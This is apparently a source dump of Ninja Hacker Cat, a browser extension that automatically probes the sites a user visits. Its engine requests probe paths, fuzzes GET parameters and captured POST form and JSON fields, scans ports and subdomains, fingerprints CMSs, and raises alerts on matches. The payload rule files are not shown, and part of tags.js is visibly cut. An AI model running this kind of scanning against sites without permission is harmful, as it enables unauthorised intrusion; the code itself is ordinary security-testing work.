├── .gitignore ├── FUNDING.yml ├── LICENSE ├── Nix8810.woff ├── engine ├── detection.js ├── engine.js ├── fuzzing.js ├── helper.js └── tags.js ├── images ├── cat-default-grey.png ├── cat-default.png ├── cat-laugh.png ├── cat-love.png ├── cat-omg.png └── cat-panic.png ├── manifest.json ├── panel.css ├── panel.html ├── readme.md ├── rules ├── fuzzing.js ├── leak-urls.js ├── poc.js ├── versions.js └── web.js ├── scripts ├── background.js └── main.js ├── sounds ├── miau1.mp3 └── miau2.mp3 └── trash.svg /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* 2 | images/.DS_Store 3 | .DS_Store 4 | Ninja-Hacker-Cat.zip 5 | -------------------------------------------------------------------------------- /FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: leetcore 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Mozilla Public License Version 2.0 2 | ================================== 3 | 4 | 1. Definitions 5 | -------------- 6 | 7 | 1.1. "Contributor" 8 | means each individual or legal entity that creates, contributes to 9 | the creation of, or owns Covered Software. 10 | 11 | 1.2. "Contributor Version" 12 | means the combination of the Contributions of others (if any) used 13 | by a Contributor and that particular Contributor's Contribution. 14 | 15 | 1.3. "Contribution" 16 | means Covered Software of a particular Contributor. 17 | 18 | 1.4. "Covered Software" 19 | means Source Code Form to which the initial Contributor has attached 20 | the notice in Exhibit A, the Executable Form of such Source Code 21 | Form, and Modifications of such Source Code Form, in each case 22 | including portions thereof. 23 | 24 | 1.5. "Incompatible With Secondary Licenses" 25 | means 26 | 27 | (a) that the initial Contributor has attached the notice described 28 | in Exhibit B to the Covered Software; or 29 | 30 | (b) that the Covered Software was made available under the terms of 31 | version 1.1 or earlier of the License, but not also under the 32 | terms of a Secondary License. 33 | 34 | 1.6. "Executable Form" 35 | means any form of the work other than Source Code Form. 36 | 37 | 1.7. "Larger Work" 38 | means a work that combines Covered Software with other material, in 39 | a separate file or files, that is not Covered Software. 40 | 41 | 1.8. "License" 42 | means this document. 43 | 44 | 1.9. "Licensable" 45 | means having the right to grant, to the maximum extent possible, 46 | whether at the time of the initial grant or subsequently, any and 47 | all of the rights conveyed by this License. 48 | 49 | 1.10. "Modifications" 50 | means any of the following: 51 | 52 | (a) any file in Source Code Form that results from an addition to, 53 | deletion from, or modification of the contents of Covered 54 | Software; or 55 | 56 | (b) any new file in Source Code Form that contains any Covered 57 | Software. 58 | 59 | 1.11. "Patent Claims" of a Contributor 60 | means any patent claim(s), including without limitation, method, 61 | process, and apparatus claims, in any patent Licensable by such 62 | Contributor that would be infringed, but for the grant of the 63 | License, by the making, using, selling, offering for sale, having 64 | made, import, or transfer of either its Contributions or its 65 | Contributor Version. 66 | 67 | 1.12. "Secondary License" 68 | means either the GNU General Public License, Version 2.0, the GNU 69 | Lesser General Public License, Version 2.1, the GNU Affero General 70 | Public License, Version 3.0, or any later versions of those 71 | licenses. 72 | 73 | 1.13. "Source Code Form" 74 | means the form of the work preferred for making modifications. 75 | 76 | 1.14. "You" (or "Your") 77 | means an individual or a legal entity exercising rights under this 78 | License. For legal entities, "You" includes any entity that 79 | controls, is controlled by, or is under common control with You. For 80 | purposes of this definition, "control" means (a) the power, direct 81 | or indirect, to cause the direction or management of such entity, 82 | whether by contract or otherwise, or (b) ownership of more than 83 | fifty percent (50%) of the outstanding shares or beneficial 84 | ownership of such entity. 85 | 86 | 2. License Grants and Conditions 87 | -------------------------------- 88 | 89 | 2.1. Grants 90 | 91 | Each Contributor hereby grants You a world-wide, royalty-free, 92 | non-exclusive license: 93 | 94 | (a) under intellectual property rights (other than patent or trademark) 95 | Licensable by such Contributor to use, reproduce, make available, 96 | modify, display, perform, distribute, and otherwise exploit its 97 | Contributions, either on an unmodified basis, with Modifications, or 98 | as part of a Larger Work; and 99 | 100 | (b) under Patent Claims of such Contributor to make, use, sell, offer 101 | for sale, have made, import, and otherwise transfer either its 102 | Contributions or its Contributor Version. 103 | 104 | 2.2. Effective Date 105 | 106 | The licenses granted in Section 2.1 with respect to any Contribution 107 | become effective for each Contribution on the date the Contributor first 108 | distributes such Contribution. 109 | 110 | 2.3. Limitations on Grant Scope 111 | 112 | The licenses granted in this Section 2 are the only rights granted under 113 | this License. No additional rights or licenses will be implied from the 114 | distribution or licensing of Covered Software under this License. 115 | Notwithstanding Section 2.1(b) above, no patent license is granted by a 116 | Contributor: 117 | 118 | (a) for any code that a Contributor has removed from Covered Software; 119 | or 120 | 121 | (b) for infringements caused by: (i) Your and any other third party's 122 | modifications of Covered Software, or (ii) the combination of its 123 | Contributions with other software (except as part of its Contributor 124 | Version); or 125 | 126 | (c) under Patent Claims infringed by Covered Software in the absence of 127 | its Contributions. 128 | 129 | This License does not grant any rights in the trademarks, service marks, 130 | or logos of any Contributor (except as may be necessary to comply with 131 | the notice requirements in Section 3.4). 132 | 133 | 2.4. Subsequent Licenses 134 | 135 | No Contributor makes additional grants as a result of Your choice to 136 | distribute the Covered Software under a subsequent version of this 137 | License (see Section 10.2) or under the terms of a Secondary License (if 138 | permitted under the terms of Section 3.3). 139 | 140 | 2.5. Representation 141 | 142 | Each Contributor represents that the Contributor believes its 143 | Contributions are its original creation(s) or it has sufficient rights 144 | to grant the rights to its Contributions conveyed by this License. 145 | 146 | 2.6. Fair Use 147 | 148 | This License is not intended to limit any rights You have under 149 | applicable copyright doctrines of fair use, fair dealing, or other 150 | equivalents. 151 | 152 | 2.7. Conditions 153 | 154 | Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted 155 | in Section 2.1. 156 | 157 | 3. Responsibilities 158 | ------------------- 159 | 160 | 3.1. Distribution of Source Form 161 | 162 | All distribution of Covered Software in Source Code Form, including any 163 | Modifications that You create or to which You contribute, must be under 164 | the terms of this License. You must inform recipients that the Source 165 | Code Form of the Covered Software is governed by the terms of this 166 | License, and how they can obtain a copy of this License. You may not 167 | attempt to alter or restrict the recipients' rights in the Source Code 168 | Form. 169 | 170 | 3.2. Distribution of Executable Form 171 | 172 | If You distribute Covered Software in Executable Form then: 173 | 174 | (a) such Covered Software must also be made available in Source Code 175 | Form, as described in Section 3.1, and You must inform recipients of 176 | the Executable Form how they can obtain a copy of such Source Code 177 | Form by reasonable means in a timely manner, at a charge no more 178 | than the cost of distribution to the recipient; and 179 | 180 | (b) You may distribute such Executable Form under the terms of this 181 | License, or sublicense it under different terms, provided that the 182 | license for the Executable Form does not attempt to limit or alter 183 | the recipients' rights in the Source Code Form under this License. 184 | 185 | 3.3. Distribution of a Larger Work 186 | 187 | You may create and distribute a Larger Work under terms of Your choice, 188 | provided that You also comply with the requirements of this License for 189 | the Covered Software. If the Larger Work is a combination of Covered 190 | Software with a work governed by one or more Secondary Licenses, and the 191 | Covered Software is not Incompatible With Secondary Licenses, this 192 | License permits You to additionally distribute such Covered Software 193 | under the terms of such Secondary License(s), so that the recipient of 194 | the Larger Work may, at their option, further distribute the Covered 195 | Software under the terms of either this License or such Secondary 196 | License(s). 197 | 198 | 3.4. Notices 199 | 200 | You may not remove or alter the substance of any license notices 201 | (including copyright notices, patent notices, disclaimers of warranty, 202 | or limitations of liability) contained within the Source Code Form of 203 | the Covered Software, except that You may alter any license notices to 204 | the extent required to remedy known factual inaccuracies. 205 | 206 | 3.5. Application of Additional Terms 207 | 208 | You may choose to offer, and to charge a fee for, warranty, support, 209 | indemnity or liability obligations to one or more recipients of Covered 210 | Software. However, You may do so only on Your own behalf, and not on 211 | behalf of any Contributor. You must make it absolutely clear that any 212 | such warranty, support, indemnity, or liability obligation is offered by 213 | You alone, and You hereby agree to indemnify every Contributor for any 214 | liability incurred by such Contributor as a result of warranty, support, 215 | indemnity or liability terms You offer. You may include additional 216 | disclaimers of warranty and limitations of liability specific to any 217 | jurisdiction. 218 | 219 | 4. Inability to Comply Due to Statute or Regulation 220 | --------------------------------------------------- 221 | 222 | If it is impossible for You to comply with any of the terms of this 223 | License with respect to some or all of the Covered Software due to 224 | statute, judicial order, or regulation then You must: (a) comply with 225 | the terms of this License to the maximum extent possible; and (b) 226 | describe the limitations and the code they affect. Such description must 227 | be placed in a text file included with all distributions of the Covered 228 | Software under this License. Except to the extent prohibited by statute 229 | or regulation, such description must be sufficiently detailed for a 230 | recipient of ordinary skill to be able to understand it. 231 | 232 | 5. Termination 233 | -------------- 234 | 235 | 5.1. The rights granted under this License will terminate automatically 236 | if You fail to comply with any of its terms. However, if You become 237 | compliant, then the rights granted under this License from a particular 238 | Contributor are reinstated (a) provisionally, unless and until such 239 | Contributor explicitly and finally terminates Your grants, and (b) on an 240 | ongoing basis, if such Contributor fails to notify You of the 241 | non-compliance by some reasonable means prior to 60 days after You have 242 | come back into compliance. Moreover, Your grants from a particular 243 | Contributor are reinstated on an ongoing basis if such Contributor 244 | notifies You of the non-compliance by some reasonable means, this is the 245 | first time You have received notice of non-compliance with this License 246 | from such Contributor, and You become compliant prior to 30 days after 247 | Your receipt of the notice. 248 | 249 | 5.2. If You initiate litigation against any entity by asserting a patent 250 | infringement claim (excluding declaratory judgment actions, 251 | counter-claims, and cross-claims) alleging that a Contributor Version 252 | directly or indirectly infringes any patent, then the rights granted to 253 | You by any and all Contributors for the Covered Software under Section 254 | 2.1 of this License shall terminate. 255 | 256 | 5.3. In the event of termination under Sections 5.1 or 5.2 above, all 257 | end user license agreements (excluding distributors and resellers) which 258 | have been validly granted by You or Your distributors under this License 259 | prior to termination shall survive termination. 260 | 261 | ************************************************************************ 262 | * * 263 | * 6. Disclaimer of Warranty * 264 | * ------------------------- * 265 | * * 266 | * Covered Software is provided under this License on an "as is" * 267 | * basis, without warranty of any kind, either expressed, implied, or * 268 | * statutory, including, without limitation, warranties that the * 269 | * Covered Software is free of defects, merchantable, fit for a * 270 | * particular purpose or non-infringing. The entire risk as to the * 271 | * quality and performance of the Covered Software is with You. * 272 | * Should any Covered Software prove defective in any respect, You * 273 | * (not any Contributor) assume the cost of any necessary servicing, * 274 | * repair, or correction. This disclaimer of warranty constitutes an * 275 | * essential part of this License. No use of any Covered Software is * 276 | * authorized under this License except under this disclaimer. * 277 | * * 278 | ************************************************************************ 279 | 280 | ************************************************************************ 281 | * * 282 | * 7. Limitation of Liability * 283 | * -------------------------- * 284 | * * 285 | * Under no circumstances and under no legal theory, whether tort * 286 | * (including negligence), contract, or otherwise, shall any * 287 | * Contributor, or anyone who distributes Covered Software as * 288 | * permitted above, be liable to You for any direct, indirect, * 289 | * special, incidental, or consequential damages of any character * 290 | * including, without limitation, damages for lost profits, loss of * 291 | * goodwill, work stoppage, computer failure or malfunction, or any * 292 | * and all other commercial damages or losses, even if such party * 293 | * shall have been informed of the possibility of such damages. This * 294 | * limitation of liability shall not apply to liability for death or * 295 | * personal injury resulting from such party's negligence to the * 296 | * extent applicable law prohibits such limitation. Some * 297 | * jurisdictions do not allow the exclusion or limitation of * 298 | * incidental or consequential damages, so this exclusion and * 299 | * limitation may not apply to You. * 300 | * * 301 | ************************************************************************ 302 | 303 | 8. Litigation 304 | ------------- 305 | 306 | Any litigation relating to this License may be brought only in the 307 | courts of a jurisdiction where the defendant maintains its principal 308 | place of business and such litigation shall be governed by laws of that 309 | jurisdiction, without reference to its conflict-of-law provisions. 310 | Nothing in this Section shall prevent a party's ability to bring 311 | cross-claims or counter-claims. 312 | 313 | 9. Miscellaneous 314 | ---------------- 315 | 316 | This License represents the complete agreement concerning the subject 317 | matter hereof. If any provision of this License is held to be 318 | unenforceable, such provision shall be reformed only to the extent 319 | necessary to make it enforceable. Any law or regulation which provides 320 | that the language of a contract shall be construed against the drafter 321 | shall not be used to construe this License against a Contributor. 322 | 323 | 10. Versions of the License 324 | --------------------------- 325 | 326 | 10.1. New Versions 327 | 328 | Mozilla Foundation is the license steward. Except as provided in Section 329 | 10.3, no one other than the license steward has the right to modify or 330 | publish new versions of this License. Each version will be given a 331 | distinguishing version number. 332 | 333 | 10.2. Effect of New Versions 334 | 335 | You may distribute the Covered Software under the terms of the version 336 | of the License under which You originally received the Covered Software, 337 | or under the terms of any subsequent version published by the license 338 | steward. 339 | 340 | 10.3. Modified Versions 341 | 342 | If you create software not governed by this License, and you want to 343 | create a new license for such software, you may create and use a 344 | modified version of this License if you rename the license and remove 345 | any references to the name of the license steward (except to note that 346 | such modified license differs from this License). 347 | 348 | 10.4. Distributing Source Code Form that is Incompatible With Secondary 349 | Licenses 350 | 351 | If You choose to distribute Source Code Form that is Incompatible With 352 | Secondary Licenses under the terms of this version of the License, the 353 | notice described in Exhibit B of this License must be attached. 354 | 355 | Exhibit A - Source Code Form License Notice 356 | ------------------------------------------- 357 | 358 | This Source Code Form is subject to the terms of the Mozilla Public 359 | License, v. 2.0. If a copy of the MPL was not distributed with this 360 | file, You can obtain one at https://mozilla.org/MPL/2.0/. 361 | 362 | If it is not possible or desirable to put the notice in a particular 363 | file, then You may include the notice in a location (such as a LICENSE 364 | file in a relevant directory) where a recipient would be likely to look 365 | for such a notice. 366 | 367 | You may add additional accurate notices of copyright ownership. 368 | 369 | Exhibit B - "Incompatible With Secondary Licenses" Notice 370 | --------------------------------------------------------- 371 | 372 | This Source Code Form is "Incompatible With Secondary Licenses", as 373 | defined by the Mozilla Public License, v. 2.0. 374 | 375 | Copyright 1337core, 2022 -------------------------------------------------------------------------------- /Nix8810.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/Nix8810.woff -------------------------------------------------------------------------------- /engine/detection.js: -------------------------------------------------------------------------------- 1 | class Message { 2 | constructor(url, title, detectedBy, size, avatar, critLevel) { 3 | this.url = url 4 | this.title = title 5 | this.detectedBy = detectedBy 6 | this.size = size 7 | this.avatar = avatar 8 | this.critLevel = critLevel || 0 9 | this.render() 10 | } 11 | 12 | render() { 13 | const messageBox = document.querySelector("#messageBox"); 14 | // check if message is there already 15 | for (let message of document.querySelectorAll(".message")) { 16 | if (message.querySelector(".title")?.textContent == this.title 17 | && message.querySelector(".url")?.textContent == this.url 18 | && message.querySelector(".size_number")?.textContent == this.size 19 | && message.querySelector(".detectedBy")?.textContent == this.detectedBy) { 20 | return; 21 | } 22 | } 23 | 24 | // higher critlevel should be on top 25 | let position = "beforeend" 26 | if (this.critLevel > 1) { 27 | position = "afterbegin" 28 | } 29 | messageBox.insertAdjacentHTML(position, ` 30 |
31 |
32 | 33 | Size:
34 | 35 | Detected by: 36 | 37 |
`) 38 | document.querySelector('#this_title').textContent = this.title 39 | document.querySelector('#this_title').removeAttribute('id') 40 | document.querySelector('#this_url').textContent = this.url 41 | document.querySelector('#this_url').href = this.url 42 | document.querySelector('#this_url').removeAttribute('id') 43 | document.querySelector('#this_size').textContent = this.size 44 | document.querySelector('#this_size').removeAttribute('id') 45 | document.querySelector('#this_detectedBy').textContent = this.detectedBy 46 | document.querySelector('#this_detectedBy').removeAttribute('id') 47 | 48 | if (this.critLevel > 0) { 49 | document.querySelector('#sound').src = "sounds/miau1.mp3" 50 | document.querySelector('#sound').play() 51 | } 52 | 53 | 54 | // change the cat -> only show the highest critLevel 55 | if (this.avatar && this.critLevel >= window.nhc_currentCritLevel) { 56 | window.nhc_currentCritLevel = this.critLevel 57 | document.querySelectorAll('.avatar').forEach(avatar => { 58 | avatar.style.display = 'none'; 59 | }) 60 | if (document.querySelector(`#${this.avatar}`)) { 61 | document.querySelector(`#${this.avatar}`).style.display = 'block' 62 | } 63 | } 64 | 65 | if (this.critLevel > 0) { 66 | browser.notifications.create( 67 | { 68 | type: 'basic', 69 | title: 'Miau!', 70 | message: `${this.title} (${this.detectedBy})`, 71 | } 72 | ) 73 | } 74 | 75 | document.querySelector('#reset').classList.remove('hidden') 76 | } 77 | } 78 | 79 | export function detection(request_url, rule, response, body = "", detectedBy = "") { 80 | let status_code = response.status 81 | let status_filtered = (rule.filterStatusCodes || []) 82 | .find(statusCode => statusCode === status_code.toString()) 83 | let status_matched = (rule.detectStatusCodes || []) 84 | .find(statusCode => statusCode === status_code.toString()) 85 | 86 | // detection: match status code or skip if no one is set 87 | if (status_filtered || !rule.filterStatusCodes) { 88 | // detect substring in response body 89 | for (let detect of (rule.detectResponses || [])) { 90 | // simple response detection with strings 91 | if (body.toLowerCase().indexOf(detect.toLowerCase()) >= 0) { 92 | new Message( 93 | request_url, 94 | rule.title, 95 | detectedBy, 96 | body.length, 97 | rule.cat, 98 | rule.critLevel 99 | ) 100 | break 101 | } 102 | } 103 | 104 | // detect version with regex 105 | if (rule.regexVersion) { 106 | let regex = new RegExp(rule.regexVersion) 107 | let detectMatch = null 108 | if (rule.matchRegexHeaderName) { 109 | let header = response.headers.get(rule.matchRegexHeaderName) 110 | detectMatch = header.match(regex) 111 | } else { 112 | detectMatch = body.match(regex) 113 | } 114 | 115 | if (detectMatch && detectMatch.length > 0) { 116 | let version = detectMatch[1] 117 | if (checkIfVersionNumbersMatches(version, rule.minVersion, rule.maxVersion)) { 118 | new Message( 119 | request_url, 120 | rule.title, 121 | detectedBy, 122 | body.length, 123 | rule.cat, 124 | rule.critLevel 125 | ) 126 | } 127 | } 128 | } 129 | 130 | // detect if a specific response header is there 131 | for (let detect of (rule.detectHeaders || [])) { 132 | if (response.headers.get(detect)) { 133 | new Message( 134 | request_url, 135 | rule.title, 136 | detectedBy, 137 | body.length, 138 | rule.cat, 139 | rule.critLevel 140 | ) 141 | break 142 | } 143 | } 144 | } 145 | 146 | if (status_matched && !status_filtered) { 147 | // check if redirect is a must have 148 | if (rule.isRedirected && !response.redirected) { 149 | return; 150 | } 151 | 152 | if (rule.skipRedirected && response.redirected) { 153 | return; 154 | } 155 | 156 | // detection based only on response status code 157 | for (let status of rule.detectStatusCodes) { 158 | if (status_matched == status) { 159 | new Message( 160 | request_url, 161 | rule.title, 162 | detectedBy, 163 | body.length, 164 | rule.cat, 165 | rule.critLevel 166 | ) 167 | break 168 | } 169 | } 170 | } 171 | } 172 | 173 | function checkIfVersionNumbersMatches(version, minVersion, maxVersion) { 174 | let normalizedVersionString = version.split(".") 175 | .map(num => num.padStart(8, "0")) 176 | .join(".") 177 | let normalizedMinVersionString = minVersion.split(".") 178 | .map(num => num.padStart(8, "0")) 179 | .join(".") 180 | let normalizedMaxVersionString = maxVersion.split(".") 181 | .map(num => num.padStart(8, "0")) 182 | .join(".") 183 | 184 | return normalizedMinVersionString <= normalizedVersionString 185 | && normalizedMaxVersionString >= normalizedVersionString; 186 | } -------------------------------------------------------------------------------- /engine/engine.js: -------------------------------------------------------------------------------- 1 | import { detection } from "./detection.js" 2 | import { request } from "./helper.js" 3 | 4 | // this engine will make requests based on the current url 5 | export async function engine(rules, detectedTags, url) { 6 | let parsedUrl = new URL(url) 7 | let rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname 8 | if (parsedUrl.port.length > 0) { 9 | rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname + ":" + parsedUrl.port 10 | } 11 | 12 | for (let rule of rules) { 13 | // filter checks with tags 14 | // check if rule has a the same tag as in detectedTags 15 | if (!checkIfRuleTagMatches(rule.tags, detectedTags)) { 16 | continue 17 | } 18 | 19 | // only execute rule if tags match 20 | if (rule.paths) { 21 | console.log("Start detection based on GET paths") 22 | // filter rules by detect tags 23 | for (let path of rule.paths) { 24 | // filter url and remove last "/" 25 | if (url[url.length - 1] == "/") { 26 | url = url.substring(0, url.length - 1) 27 | } 28 | 29 | let requestUrl = url + path 30 | 31 | // run request 32 | let result = await request( 33 | requestUrl, 34 | null, 35 | rule.method, 36 | rule.postBody, 37 | rule.postJSON 38 | ) 39 | 40 | // detection based on server answer 41 | if (result) { 42 | detection(requestUrl, rule, result.response, result.body, path) 43 | } 44 | } 45 | } else if (rule.rootPaths) { 46 | console.log("Start detection based on root url") 47 | for (let rootPath of rule.rootPaths) { 48 | let requestUrl = rootUrl + rootPath 49 | console.log(requestUrl) 50 | 51 | // run request 52 | let result = await request( 53 | requestUrl, 54 | rule.headers, 55 | rule.method, 56 | rule.postBody, 57 | rule.postJSON 58 | ) 59 | 60 | // detection based on server answer 61 | if (result) { 62 | detection(requestUrl, rule, result.response, result.body, rootPath) 63 | } 64 | } 65 | } else if (rule.params) { 66 | console.log("Start detection of GET parameters") 67 | let split_url = url.split("?") 68 | if (split_url.length == 0) { 69 | console.warn("Url has no ? sign.") 70 | continue 71 | } 72 | 73 | for (let rule_param of rule.params) { 74 | let urlParams = new URLSearchParams(split_url[1]) 75 | let paramCount = Array.from(urlParams).length 76 | 77 | // iterate the params and change the param at the index 78 | for (let index = 0; index < paramCount; index++) { 79 | let key = Array.from(urlParams)[index][0] 80 | urlParams = new URLSearchParams(split_url[1]) 81 | 82 | if (rule.replaceParamValue) { 83 | urlParams.set(key, rule_param) 84 | } else { 85 | let current_param = urlParams.get(key) 86 | urlParams.set(key, current_param + rule_param) 87 | } 88 | 89 | let requestUrl = split_url[0] + "?" + urlParams.toString() 90 | 91 | // run request 92 | let result = await request( 93 | requestUrl, 94 | rule.headers, 95 | rule.method, 96 | rule.postBody, 97 | rule.postJSON 98 | ) 99 | if (result) { 100 | detection(requestUrl, rule, result.response, result.body, rule_param) 101 | } 102 | } 103 | } 104 | } else if (rule.ports) { 105 | console.log("Start detection of ports") 106 | let url_parsed = new URL(url) 107 | for (let port of rule.ports) { 108 | let protocol = "https://" 109 | if (port.includes("80")) { 110 | protocol = "http://" 111 | } 112 | try { 113 | let requestUrl = protocol + url_parsed.hostname + ":" + port 114 | 115 | // run request 116 | let result = await request( 117 | requestUrl, 118 | null, 119 | "HEAD", 120 | null, 121 | null, 122 | ["nowait"] 123 | ) 124 | 125 | if (result) { 126 | detection(requestUrl, rule, result.response, "", port) 127 | } 128 | } catch (e) { 129 | console.warn(e) 130 | } 131 | } 132 | } else if (rule.subdomains) { 133 | console.log("Start detection of subdomains") 134 | let url_parsed = new URL(url) 135 | for (let subdomain of rule.subdomains) { 136 | try { 137 | let requestUrl = "http:" + "//" + subdomain + "." + url_parsed.hostname 138 | 139 | // run request 140 | let result = await request( 141 | requestUrl, 142 | null, 143 | "HEAD", 144 | null, 145 | null, 146 | ["nowait"] 147 | ) 148 | 149 | if (result) { 150 | detection(requestUrl, rule, result.response, "", subdomain) 151 | } 152 | } catch (e) { 153 | console.warn(e) 154 | } 155 | } 156 | } else { 157 | // rules based on tags 158 | let requestUrl = url 159 | 160 | // run request 161 | let result = await request( 162 | requestUrl, 163 | rule.headers, 164 | rule.method, 165 | rule.postBody, 166 | rule.postJSON 167 | ) 168 | if (result) { 169 | detection(requestUrl, rule, result.response, result.body, rule.detectedBy) 170 | } 171 | } 172 | } 173 | } 174 | 175 | function checkIfRuleTagMatches(tags, detectedTags) { 176 | return tags.find(tag => { 177 | for (let detectedTag of detectedTags) { 178 | if (tag == detectedTag) { 179 | return true; 180 | } 181 | } 182 | // rule with all tag 183 | if (tag == "all") { 184 | return true; 185 | } 186 | return false; 187 | }); 188 | } -------------------------------------------------------------------------------- /engine/fuzzing.js: -------------------------------------------------------------------------------- 1 | import { detection } from "./detection.js" 2 | import { countRequests } from "./helper.js" 3 | 4 | // this fuzzing engine is based on captured webrequests 5 | export async function fuzzing_engine(rules, requestDetails) { 6 | console.log("Start detection POST fuzzing") 7 | for (let rule of rules) { 8 | // there is a filter param set 9 | // skip rules for this params 10 | if (rule.filterPostParams) { 11 | let filterThisParam = true 12 | for (let filterPostParam of (rule.filterPostParams || [])) { 13 | if (requestDetails.requestBody 14 | && requestDetails.requestBody.formData 15 | && requestDetails.requestBody.formData[filterPostParam]) { 16 | filterThisParam = false 17 | break 18 | } 19 | } 20 | if (filterThisParam) { 21 | continue 22 | } 23 | } 24 | 25 | for (let param of rule.postParams) { 26 | let formData = requestDetails?.requestBody?.formData 27 | let paramCount = Object.keys(formData).length 28 | 29 | // there is no form data to change 30 | if (!paramCount) { 31 | continue 32 | } 33 | 34 | // iterate the params and change the param at the index 35 | for (let index = 0; index < paramCount; index++) { 36 | let usedParam = "" 37 | let copyFormData = {} 38 | Object.assign(copyFormData, formData) 39 | 40 | // count parameter we captured in the request 41 | if (rule.replaceParamValue) { 42 | copyFormData[Object.keys(formData)[index]] = param 43 | usedParam = Object.keys(formData)[index] + "=" + param 44 | } else { 45 | copyFormData[Object.keys(formData)[index]] = Object.values(copyFormData)[index] + param 46 | usedParam = Object.keys(formData)[index] + "=" + Object.values(copyFormData)[index] 47 | } 48 | 49 | // run request 50 | let sendData = new URLSearchParams() 51 | for (let key in copyFormData) { 52 | sendData.append(key, copyFormData[key]) 53 | } 54 | 55 | // TODO: use request instead 56 | let response = await fetch(requestDetails.url, { 57 | method: 'POST', 58 | headers: { 59 | "Content-Type": "application/x-www-form-urlencoded", 60 | "X-Requested-With": "Ninja Hacker Cat" 61 | }, 62 | body: sendData.toString() 63 | }) 64 | let body = await response.text() 65 | countRequests() 66 | 67 | detection( 68 | requestDetails.url, 69 | rule, 70 | response, 71 | body, 72 | usedParam 73 | ) 74 | } 75 | } 76 | } 77 | 78 | for (let rule of rules) { 79 | // there is a filter param set 80 | // skip rules for this params 81 | if (rule.filterPostParams) { 82 | let filterThisParam = true 83 | for (let filterPostParam of (rule.filterPostParams || [])) { 84 | if (requestDetails.requestBody 85 | && requestDetails.requestBodyJSON 86 | && requestDetails.requestBodyJSON[filterPostParam]) { 87 | filterThisParam = false 88 | break 89 | } 90 | } 91 | if (filterThisParam) { 92 | continue 93 | } 94 | } 95 | 96 | for (let param of rule.postParams) { 97 | let postJSON = requestDetails.requestBodyJSON 98 | if (!postJSON) { 99 | continue; 100 | } 101 | let paramCount = Object.keys(postJSON).length 102 | 103 | // count parameter we captured in the request 104 | for (let index = 0; index < paramCount; index++) { 105 | let usedParam = "" 106 | let copyJSON = {} 107 | Object.assign(copyJSON, postJSON) 108 | 109 | // replace / add our rule to the property at a given index 110 | if (rule.replaceParamValue) { 111 | copyJSON[Object.keys(copyJSON)[index]] = param 112 | usedParam = Object.keys(copyJSON)[index] + "=" + param 113 | } else { 114 | copyJSON[Object.keys(copyJSON)[index]] = Object.values(copyJSON)[index] + param 115 | usedParam = Object.keys(copyJSON)[index] + "=" + Object.values(copyJSON)[index] 116 | } 117 | 118 | // TODO: use request instead 119 | let response = await fetch(requestDetails.url, { 120 | method: 'POST', 121 | headers: { 122 | "Content-Type": "application/json", 123 | "X-Requested-With": "Ninja Hacker Cat" 124 | }, 125 | body: JSON.stringify(copyJSON) 126 | }) 127 | let body = await response.text() 128 | 129 | detection( 130 | requestDetails.url, 131 | rule, 132 | response, 133 | body, 134 | usedParam 135 | ) 136 | } 137 | } 138 | } 139 | } -------------------------------------------------------------------------------- /engine/helper.js: -------------------------------------------------------------------------------- 1 | function delay(ms) { 2 | return new Promise(resolve => setTimeout(resolve, ms)); 3 | } 4 | 5 | export function countRequests() { 6 | window.nhc_requestCounter += 1 7 | document.querySelector("#stats").textContent = window.nhc_requestCounter + " Requests" 8 | } 9 | 10 | export async function request(request_url, headers = null, method = "GET", data = null, json = null, requestOptions = []) { 11 | let options = {} 12 | options.method = method 13 | 14 | // add headers if needed 15 | options.headers = {} 16 | if (headers) { 17 | options.headers = headers 18 | } 19 | 20 | // mark all automatic requests with "ninja hacker cat" 21 | options.headers["X-Requested-With"] = "Ninja Hacker Cat" 22 | options.headers["Cache"] = "no-cache" 23 | 24 | // send body data 25 | if (data) { 26 | options.data = data 27 | } 28 | if (json) { 29 | options.headers["Content-Type"] = "application/json" 30 | options.data = JSON.stringify(json) 31 | } 32 | 33 | // dont request the same res twice 34 | let id = request_url + JSON.stringify(options) 35 | if (window.nhc_requestedUrls.includes(id)) { 36 | return false; 37 | } else { 38 | window.nhc_requestedUrls.push(id) 39 | } 40 | 41 | // run request 42 | if (!requestOptions.includes("nowait")) { 43 | // this sets a global timegap for parallel requests 44 | window.nhc_requestGapTimer += 400 45 | await delay(window.nhc_requestGapTimer) 46 | window.nhc_requestGapTimer -= 400 47 | } 48 | 49 | 50 | 51 | let response = await fetch(request_url, options) 52 | let body = await response.text() 53 | countRequests() 54 | 55 | return { 56 | response: response, 57 | body: body 58 | } 59 | } 60 | 61 | -------------------------------------------------------------------------------- /engine/tags.js: -------------------------------------------------------------------------------- 1 | export async function tags(requestUrl) { 2 | let parsedUrl = new URL(requestUrl) 3 | let rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname 4 | if (parsedUrl.port.length > 0) { 5 | rootUrl = parsedUrl.protocol + "//" + parsedUrl.hostname + ":" + parsedUrl.port 6 | } 7 | 8 | let allDetectedTags = [] 9 | let response = await fetch(requestUrl) 10 | let body = await response.text() 11 | body = body.toLocaleLowerCase() 12 | 13 | // detect wordpress 14 | if (body.includes("/wp-content/")) { 15 | allDetectedTags.push("wordpress") 16 | } 17 | 18 | // detect exchange owa page 19 | if (requestUrl.includes("/owa/")) { 20 | allDetectedTags.push("exchange") 21 | } 22 | 23 | // detect GET param in URL 24 | if (requestUrl.includes("?")) { 25 | allDetectedTags.push("get-param") 26 | } 27 | 28 | // detect POST param in url 29 | if (body.includes("= 0 64 | && body.includes("weblogic")) { 65 | allDetectedTags.push("weblogic") 66 | } 67 | 68 | // detect roundcube by title tag 69 | if (body.includes("Roundcube Webmail".toLowerCase())) { 70 | allDetectedTags.push("roundcube") 71 | } 72 | 73 | // detect joomla by meta generator info 74 | if (body.includes('<meta name="generator" content="Joomla'.toLowerCase())) { 75 | allDetectedTags.push("joomla") 76 | } 77 | 78 | // detect drupal by meta generator info 79 | if (body.includes('<meta name="generator" content="Drupal"'.toLowerCase())) { 80 | allDetectedTags.push("drupal") 81 | } 82 | 83 | console.log("detected tags: " + allDetectedTags) 84 | return allDetectedTags; 85 | } -------------------------------------------------------------------------------- /images/cat-default-grey.png: -------------------------------------------------------------------------------- 